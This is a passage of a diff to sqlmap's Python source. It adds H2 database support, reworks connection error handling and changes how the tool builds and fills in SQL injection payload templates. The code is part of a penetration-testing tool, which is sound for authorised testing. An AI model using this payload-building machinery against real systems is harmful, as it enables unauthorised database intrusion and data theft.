|||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.dicts import DBMS_DICT
|
from lib.core.dicts import DBMS_DICT
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.exception import SqlmapConnectionException
|
||||||
from lib.core.settings import MSSQL_ALIASES
|
from lib.core.settings import MSSQL_ALIASES
|
||||||
from lib.core.settings import MYSQL_ALIASES
|
from lib.core.settings import MYSQL_ALIASES
|
||||||
from lib.core.settings import ORACLE_ALIASES
|
from lib.core.settings import ORACLE_ALIASES
|
||||||
@@ -21,6 +22,7 @@ from lib.core.settings import MAXDB_ALIASES
|
|||||||
from lib.core.settings import SYBASE_ALIASES
|
from lib.core.settings import SYBASE_ALIASES
|
||||||
from lib.core.settings import DB2_ALIASES
|
from lib.core.settings import DB2_ALIASES
|
||||||
from lib.core.settings import HSQLDB_ALIASES
|
from lib.core.settings import HSQLDB_ALIASES
|
||||||
|
from lib.core.settings import H2_ALIASES
|
||||||
from lib.core.settings import INFORMIX_ALIASES
|
from lib.core.settings import INFORMIX_ALIASES
|
||||||
from lib.utils.sqlalchemy import SQLAlchemy
|
from lib.utils.sqlalchemy import SQLAlchemy
|
||||||
|
|
||||||
@@ -46,6 +48,8 @@ from plugins.dbms.db2 import DB2Map
|
|||||||
from plugins.dbms.db2.connector import Connector as DB2Conn
|
from plugins.dbms.db2.connector import Connector as DB2Conn
|
||||||
from plugins.dbms.hsqldb import HSQLDBMap
|
from plugins.dbms.hsqldb import HSQLDBMap
|
||||||
from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
|
from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
|
||||||
|
from plugins.dbms.h2 import H2Map
|
||||||
|
from plugins.dbms.h2.connector import Connector as H2Conn
|
||||||
from plugins.dbms.informix import InformixMap
|
from plugins.dbms.informix import InformixMap
|
||||||
from plugins.dbms.informix.connector import Connector as InformixConn
|
from plugins.dbms.informix.connector import Connector as InformixConn
|
||||||
|
|
||||||
@@ -56,19 +60,20 @@ def setHandler():
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
items = [
|
items = [
|
||||||
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
|
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
|
||||||
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
|
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
|
||||||
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
|
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
|
||||||
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
|
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
|
||||||
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
|
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
|
||||||
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
|
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
|
||||||
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
|
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
|
||||||
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
|
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
|
||||||
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
|
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
|
||||||
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
|
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
|
||||||
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
|
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
|
||||||
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
|
(DBMS.H2, H2_ALIASES, H2Map, H2Conn),
|
||||||
]
|
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
|
||||||
|
]
|
||||||
|
|
||||||
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
|
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
|
||||||
if _:
|
if _:
|
||||||
@@ -90,29 +95,41 @@ def setHandler():
|
|||||||
conf.dbmsConnector = Connector()
|
conf.dbmsConnector = Connector()
|
||||||
|
|
||||||
if conf.direct:
|
if conf.direct:
|
||||||
|
exception = None
|
||||||
dialect = DBMS_DICT[dbms][3]
|
dialect = DBMS_DICT[dbms][3]
|
||||||
|
|
||||||
if dialect:
|
if dialect:
|
||||||
sqlalchemy = SQLAlchemy(dialect=dialect)
|
try:
|
||||||
sqlalchemy.connect()
|
sqlalchemy = SQLAlchemy(dialect=dialect)
|
||||||
|
sqlalchemy.connect()
|
||||||
|
|
||||||
if sqlalchemy.connector:
|
if sqlalchemy.connector:
|
||||||
conf.dbmsConnector = sqlalchemy
|
conf.dbmsConnector = sqlalchemy
|
||||||
else:
|
except Exception as ex:
|
||||||
try:
|
exception = ex
|
||||||
conf.dbmsConnector.connect()
|
|
||||||
except NameError:
|
if not dialect or exception:
|
||||||
pass
|
try:
|
||||||
else:
|
conf.dbmsConnector.connect()
|
||||||
conf.dbmsConnector.connect()
|
except Exception as ex:
|
||||||
|
if exception:
|
||||||
|
raise exception
|
||||||
|
else:
|
||||||
|
if not isinstance(ex, NameError):
|
||||||
|
raise
|
||||||
|
else:
|
||||||
|
msg = "support for direct connection to '%s' is not available. " % dbms
|
||||||
|
msg += "Please rerun with '--dependencies'"
|
||||||
|
raise SqlmapConnectionException(msg)
|
||||||
|
|
||||||
if conf.forceDbms == dbms or handler.checkDbms():
|
if conf.forceDbms == dbms or handler.checkDbms():
|
||||||
if kb.resolutionDbms:
|
if kb.resolutionDbms:
|
||||||
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
|
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
|
||||||
|
conf.dbmsHandler._dbms = kb.resolutionDbms
|
||||||
else:
|
else:
|
||||||
conf.dbmsHandler = handler
|
conf.dbmsHandler = handler
|
||||||
|
conf.dbmsHandler._dbms = dbms
|
||||||
|
|
||||||
conf.dbmsHandler._dbms = dbms
|
|
||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
conf.dbmsConnector = None
|
conf.dbmsConnector = None
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -43,6 +43,7 @@ from lib.core.settings import INFERENCE_MARKER
|
|||||||
from lib.core.settings import NULL
|
from lib.core.settings import NULL
|
||||||
from lib.core.settings import PAYLOAD_DELIMITER
|
from lib.core.settings import PAYLOAD_DELIMITER
|
||||||
from lib.core.settings import REPLACEMENT_MARKER
|
from lib.core.settings import REPLACEMENT_MARKER
|
||||||
|
from lib.core.settings import SINGLE_QUOTE_MARKER
|
||||||
from lib.core.settings import SLEEP_TIME_MARKER
|
from lib.core.settings import SLEEP_TIME_MARKER
|
||||||
from lib.core.unescaper import unescaper
|
from lib.core.unescaper import unescaper
|
||||||
|
|
||||||
@@ -97,6 +98,7 @@ class Agent(object):
|
|||||||
paramString = conf.parameters[place]
|
paramString = conf.parameters[place]
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
origValue = getUnicode(paramDict[parameter])
|
origValue = getUnicode(paramDict[parameter])
|
||||||
|
newValue = getUnicode(newValue) if newValue else newValue
|
||||||
|
|
||||||
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
@@ -105,7 +107,7 @@ class Agent(object):
|
|||||||
else:
|
else:
|
||||||
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
|
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
|
||||||
origValue = origValue[origValue.rfind('/') + 1:]
|
origValue = origValue[origValue.rfind('/') + 1:]
|
||||||
for char in ('?', '=', ':', ','):
|
for char in ('?', '=', ':', ',', '&'):
|
||||||
if char in origValue:
|
if char in origValue:
|
||||||
origValue = origValue[origValue.rfind(char) + 1:]
|
origValue = origValue[origValue.rfind(char) + 1:]
|
||||||
elif place == PLACE.CUSTOM_POST:
|
elif place == PLACE.CUSTOM_POST:
|
||||||
@@ -120,8 +122,8 @@ class Agent(object):
|
|||||||
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
||||||
elif place == PLACE.CUSTOM_HEADER:
|
elif place == PLACE.CUSTOM_HEADER:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
origValue = origValue.split(kb.customInjectionMark)[0]
|
|
||||||
origValue = origValue[origValue.find(',') + 1:]
|
origValue = origValue[origValue.find(',') + 1:]
|
||||||
|
origValue = origValue.split(kb.customInjectionMark)[0]
|
||||||
match = re.search(r"([^;]+)=(?P<value>[^;]*);?\Z", origValue)
|
match = re.search(r"([^;]+)=(?P<value>[^;]*);?\Z", origValue)
|
||||||
if match:
|
if match:
|
||||||
origValue = match.group("value")
|
origValue = match.group("value")
|
||||||
@@ -141,7 +143,7 @@ class Agent(object):
|
|||||||
match = re.search(r"\A[^ ]+", newValue)
|
match = re.search(r"\A[^ ]+", newValue)
|
||||||
newValue = newValue[len(match.group() if match else ""):]
|
newValue = newValue[len(match.group() if match else ""):]
|
||||||
_ = randomInt(2)
|
_ = randomInt(2)
|
||||||
value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1)
|
value = "%s%s AND %s LIKE %s" % (origValue, match.group() if match else "", _, _ + 1)
|
||||||
elif conf.invalidBignum:
|
elif conf.invalidBignum:
|
||||||
value = randomInt(6)
|
value = randomInt(6)
|
||||||
elif conf.invalidString:
|
elif conf.invalidString:
|
||||||
@@ -197,7 +199,7 @@ class Agent(object):
|
|||||||
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
|
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
|
||||||
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
||||||
else:
|
else:
|
||||||
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), r"%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
||||||
|
|
||||||
if retVal == paramString and urlencode(parameter) != parameter:
|
if retVal == paramString and urlencode(parameter) != parameter:
|
||||||
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
|
||||||
@@ -245,6 +247,9 @@ class Agent(object):
|
|||||||
else:
|
else:
|
||||||
query = kb.injection.prefix or prefix or ""
|
query = kb.injection.prefix or prefix or ""
|
||||||
|
|
||||||
|
if "SELECT '[RANDSTR]'" in query: # escaping of pre-WHERE prefixes
|
||||||
|
query = query.replace("'[RANDSTR]'", unescaper.escape(randomStr(), quote=False))
|
||||||
|
|
||||||
if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
|
if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
|
||||||
query += " "
|
query += " "
|
||||||
|
|
||||||
@@ -293,22 +298,29 @@ class Agent(object):
|
|||||||
if payload is None:
|
if payload is None:
|
||||||
return
|
return
|
||||||
|
|
||||||
_ = (
|
replacements = (
|
||||||
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
("[DELIMITER_START]", kb.chars.start),
|
||||||
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
|
("[DELIMITER_STOP]", kb.chars.stop),
|
||||||
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
|
("[AT_REPLACE]", kb.chars.at),
|
||||||
)
|
("[SPACE_REPLACE]", kb.chars.space),
|
||||||
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
|
("[DOLLAR_REPLACE]", kb.chars.dollar),
|
||||||
|
("[HASH_REPLACE]", kb.chars.hash_),
|
||||||
|
("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
|
||||||
|
)
|
||||||
|
payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload)
|
||||||
|
|
||||||
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
|
for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)):
|
||||||
payload = payload.replace(_, str(randomInt()))
|
payload = payload.replace(_, str(randomInt()))
|
||||||
|
|
||||||
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
|
for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
|
||||||
payload = payload.replace(_, randomStr())
|
payload = payload.replace(_, randomStr())
|
||||||
|
|
||||||
if origValue is not None and "[ORIGVALUE]" in payload:
|
if origValue is not None:
|
||||||
origValue = getUnicode(origValue)
|
origValue = getUnicode(origValue)
|
||||||
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
|
if "[ORIGVALUE]" in payload:
|
||||||
|
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
|
||||||
|
if "[ORIGINAL]" in payload:
|
||||||
|
payload = getUnicode(payload).replace("[ORIGINAL]", origValue)
|
||||||
|
|
||||||
if INFERENCE_MARKER in payload:
|
if INFERENCE_MARKER in payload:
|
||||||
if Backend.getIdentifiedDbms() is not None:
|
if Backend.getIdentifiedDbms() is not None:
|
||||||
@@ -337,6 +349,7 @@ class Agent(object):
|
|||||||
|
|
||||||
if payload:
|
if payload:
|
||||||
payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))
|
payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))
|
||||||
|
payload = payload.replace(SINGLE_QUOTE_MARKER, "'")
|
||||||
|
|
||||||
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
|
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
|
||||||
payload = payload.replace(_, str(randomInt()))
|
payload = payload.replace(_, str(randomInt()))
|
||||||
@@ -361,7 +374,7 @@ class Agent(object):
|
|||||||
rootQuery = queries[Backend.getIdentifiedDbms()]
|
rootQuery = queries[Backend.getIdentifiedDbms()]
|
||||||
hexField = field
|
hexField = field
|
||||||
|
|
||||||
if 'hex' in rootQuery:
|
if "hex" in rootQuery:
|
||||||
hexField = rootQuery.hex.query % field
|
hexField = rootQuery.hex.query % field
|
||||||
else:
|
else:
|
||||||
warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms()
|
warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms()
|
||||||
@@ -530,7 +543,7 @@ class Agent(object):
|
|||||||
fieldsToCastStr = fieldsToCastStr or ""
|
fieldsToCastStr = fieldsToCastStr or ""
|
||||||
|
|
||||||
# Function
|
# Function
|
||||||
if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
|
if re.search(r"\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
|
||||||
fieldsToCastList = [fieldsToCastStr]
|
fieldsToCastList = [fieldsToCastStr]
|
||||||
else:
|
else:
|
||||||
fieldsToCastList = splitFields(fieldsToCastStr)
|
fieldsToCastList = splitFields(fieldsToCastStr)
|
||||||
@@ -611,7 +624,7 @@ class Agent(object):
|
|||||||
elif fieldsNoSelect:
|
elif fieldsNoSelect:
|
||||||
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
|
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB):
|
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2):
|
||||||
if fieldsExists:
|
if fieldsExists:
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "||'%s'" % kb.chars.stop
|
concatenatedQuery += "||'%s'" % kb.chars.stop
|
||||||
@@ -622,7 +635,7 @@ class Agent(object):
|
|||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
|
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
|
||||||
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
|
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
|
||||||
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery)
|
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), r"\g<2>\g<1>\g<3>", concatenatedQuery)
|
||||||
elif fieldsSelect:
|
elif fieldsSelect:
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "||'%s'" % kb.chars.stop
|
concatenatedQuery += "||'%s'" % kb.chars.stop
|
||||||
@@ -634,7 +647,7 @@ class Agent(object):
|
|||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "+'%s'" % kb.chars.stop
|
concatenatedQuery += "+'%s'" % kb.chars.stop
|
||||||
elif fieldsSelectTop:
|
elif fieldsSelectTop:
|
||||||
topNum = re.search("\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
|
topNum = re.search(r"\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1)
|
||||||
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1)
|
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1)
|
||||||
elif fieldsSelectCase:
|
elif fieldsSelectCase:
|
||||||
@@ -810,7 +823,7 @@ class Agent(object):
|
|||||||
limitRegExp2 = None
|
limitRegExp2 = None
|
||||||
|
|
||||||
if (limitRegExp or limitRegExp2) or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
|
if (limitRegExp or limitRegExp2) or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2):
|
||||||
limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
|
limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
|
||||||
limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
|
limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
|
||||||
|
|
||||||
@@ -900,14 +913,14 @@ class Agent(object):
|
|||||||
fromFrom = limitedQuery[fromIndex + 1:]
|
fromFrom = limitedQuery[fromIndex + 1:]
|
||||||
orderBy = None
|
orderBy = None
|
||||||
|
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2):
|
||||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
|
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
|
||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
||||||
elif Backend.isDbms(DBMS.HSQLDB):
|
elif Backend.isDbms(DBMS.HSQLDB):
|
||||||
match = re.search(r"ORDER BY [^ ]+", limitedQuery)
|
match = re.search(r"ORDER BY [^ ]+", limitedQuery)
|
||||||
if match:
|
if match:
|
||||||
limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip()
|
limitedQuery = re.sub(r"\s*%s\s*" % re.escape(match.group(0)), " ", limitedQuery).strip()
|
||||||
limitedQuery += " %s" % match.group(0)
|
limitedQuery += " %s" % match.group(0)
|
||||||
|
|
||||||
if query.startswith("SELECT "):
|
if query.startswith("SELECT "):
|
||||||
@@ -927,7 +940,7 @@ class Agent(object):
|
|||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
if not " ORDER BY " in limitedQuery:
|
if " ORDER BY " not in limitedQuery:
|
||||||
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
|
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
|
||||||
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
|
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
|
||||||
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
||||||
@@ -1081,7 +1094,7 @@ class Agent(object):
|
|||||||
if conf.dumpWhere and query:
|
if conf.dumpWhere and query:
|
||||||
prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "")
|
prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "")
|
||||||
|
|
||||||
if "%s)" % conf.tbl.upper() in prefix.upper():
|
if conf.tbl and "%s)" % conf.tbl.upper() in prefix.upper():
|
||||||
prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
|
prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
|
||||||
elif re.search(r"(?i)\bWHERE\b", prefix):
|
elif re.search(r"(?i)\bWHERE\b", prefix):
|
||||||
prefix += " AND %s" % conf.dumpWhere
|
prefix += " AND %s" % conf.dumpWhere
|
||||||
|
|||||||
@@ -1,20 +1,20 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
import cPickle as pickle
|
import cPickle as pickle
|
||||||
except:
|
except:
|
||||||
import pickle
|
import pickle
|
||||||
|
|
||||||
|
import bz2
|
||||||
import itertools
|
import itertools
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
import tempfile
|
import tempfile
|
||||||
import zlib
|
|
||||||
|
|
||||||
from lib.core.enums import MKSTEMP_PREFIX
|
from lib.core.enums import MKSTEMP_PREFIX
|
||||||
from lib.core.exception import SqlmapSystemException
|
from lib.core.exception import SqlmapSystemException
|
||||||
@@ -52,7 +52,7 @@ class BigArray(list):
|
|||||||
List-like class used for storing large amounts of data (disk cached)
|
List-like class used for storing large amounts of data (disk cached)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self, items=[]):
|
||||||
self.chunks = [[]]
|
self.chunks = [[]]
|
||||||
self.chunk_length = sys.maxint
|
self.chunk_length = sys.maxint
|
||||||
self.cache = None
|
self.cache = None
|
||||||
@@ -60,6 +60,9 @@ class BigArray(list):
|
|||||||
self._os_remove = os.remove
|
self._os_remove = os.remove
|
||||||
self._size_counter = 0
|
self._size_counter = 0
|
||||||
|
|
||||||
|
for item in items:
|
||||||
|
self.append(item)
|
||||||
|
|
||||||
def append(self, value):
|
def append(self, value):
|
||||||
self.chunks[-1].append(value)
|
self.chunks[-1].append(value)
|
||||||
|
|
||||||
@@ -83,11 +86,11 @@ class BigArray(list):
|
|||||||
self.chunks.pop()
|
self.chunks.pop()
|
||||||
try:
|
try:
|
||||||
with open(self.chunks[-1], "rb") as f:
|
with open(self.chunks[-1], "rb") as f:
|
||||||
self.chunks[-1] = pickle.loads(zlib.decompress(f.read()))
|
self.chunks[-1] = pickle.loads(bz2.decompress(f.read()))
|
||||||
except IOError, ex:
|
except IOError as ex:
|
||||||
errMsg = "exception occurred while retrieving data "
|
errMsg = "exception occurred while retrieving data "
|
||||||
errMsg += "from a temporary file ('%s')" % ex.message
|
errMsg += "from a temporary file ('%s')" % ex.message
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
return self.chunks[-1].pop()
|
return self.chunks[-1].pop()
|
||||||
|
|
||||||
@@ -104,15 +107,15 @@ class BigArray(list):
|
|||||||
self.filenames.add(filename)
|
self.filenames.add(filename)
|
||||||
os.close(handle)
|
os.close(handle)
|
||||||
with open(filename, "w+b") as f:
|
with open(filename, "w+b") as f:
|
||||||
f.write(zlib.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))
|
f.write(bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))
|
||||||
return filename
|
return filename
|
||||||
except (OSError, IOError), ex:
|
except (OSError, IOError) as ex:
|
||||||
errMsg = "exception occurred while storing data "
|
errMsg = "exception occurred while storing data "
|
